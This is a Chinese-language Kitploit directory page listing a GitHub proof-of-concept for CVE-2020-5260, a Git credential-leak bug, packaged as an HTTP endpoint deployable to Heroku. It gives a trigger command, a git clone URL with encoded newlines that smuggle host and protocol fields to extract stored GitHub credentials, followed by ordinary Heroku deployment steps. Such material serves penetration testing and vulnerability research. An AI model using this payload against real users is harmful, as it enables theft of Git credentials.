Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2020-5260 — 一个可部署到Heroku的cve-2020-5260 HTTP PoC端点 | Kitploit
工具/GitHubGitHub/brompwnie/cve-2020-5260
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubbrompwnie/cve-2020-5260

cve-2020-5260

一个可部署到Heroku的cve-2020-5260 HTTP PoC端点

查看仓库
37716年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

cve-2020-5260

一个针对 cve-2020-5260 的 HTTP PoC 端点,可部署到 Heroku

致谢信息

Google Project Zero 的 Felix Wilhelm https://bugs.chromium.org/p/project-zero/issues/detail?id=2021

触发漏洞

git clone 'https://YourHerokuAppNameAndNotMine.herokuapp.com?%0ahost=github.com%0aprotocol=ssh'

将 PoC 部署到 Heroku

点击此按钮即可自动部署到 Heroku...

Deploy

或者按照以下步骤操作...

是的,我理解为了设置这个 PoC 而需要运行 Git clone 命令的讽刺意味....

通过 https://devcenter.heroku.com/articles/heroku-cli 安装 Heroku CLI

如果尚未登录,请登录您的 Heroku 账户并按照提示创建新的 SSH 公钥。

$ heroku login

克隆仓库

使用 Git 将 cve-2020-5260 的源代码克隆到本地计算机。

$ mkdir cve-2020-5260
$ cd cve-2020-5260
$ git init
$ heroku apps:create cve-2020-5260
$ git clone https://github.com/brompwnie/cve-2020-5260

部署您的更改

对刚刚克隆的代码做一些更改,然后使用 Git 将它们部署到 Heroku。

$ git add .
$ git commit -am "make it better"
$ git push heroku master
下载工具